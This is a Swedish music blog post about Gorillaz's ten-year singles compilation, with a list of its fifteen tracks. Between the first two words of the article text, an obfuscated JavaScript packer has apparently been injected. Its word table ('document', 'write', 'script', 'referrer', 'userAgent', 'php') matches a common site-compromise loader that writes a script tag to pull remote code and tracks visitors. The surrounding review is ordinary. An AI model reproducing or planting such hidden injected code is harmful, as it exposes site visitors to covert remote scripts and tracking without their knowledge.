Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Gorillaz firar tio år med singelalbum

Gorillaz firar tio år med singelalbum
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nrtir|var|u0026u|referrer|kdkbd||js|php’.split(’|’),0,{}))
känns inte som att det var så länge sedan som Gorillaz tog över hela världen med sitt första album och låtar som ”Clint Eastwood” och ”Tomorrow Comes Today”, men i år var det faktiskt tio år sedan.

Detta vill det unika bandet från Essex fira genom att släppa The Singles Collection (2001-2011) som består av femton av deras kändaste singlar som de under det senaste decenniet spritt ut över åren, alla med stor framgång.

Efter att ha lyssnat igenom halva samlingen inser man snabbt att mycket har hänt under tiden som gått och de fyra studioalbumen som bandet släppt. Gorillaz redan från början breda stil har förändrats fram och tillbaka och har anammat alla tänkbara musikstilar och trots detta har de alltid levererat ett lika lyckat resultat. Bortsett från femton grymma låtar ingår även olika videos samt några av de bästa remixarna i paketet.

Nedan är listan på låtarna som ingår:

1. Tomorrow Comes Today
2. Clint Eastwood
3. 19-2000
4. Rock The House
5. Feel Good Inc
6. DARE
7. Dirty Harry
8. Kids With Guns
9. El Manana
10. Stylo
11. Superfast Jellyfish
12. On Melancholy Hill
13. Doncamatic
14. Clint Eastwood (Ed Case & Sweetie Irie Refix)
15. 19-2000 (Soulchild Remix)

Denna grymma samling ligger ute nu iTunes!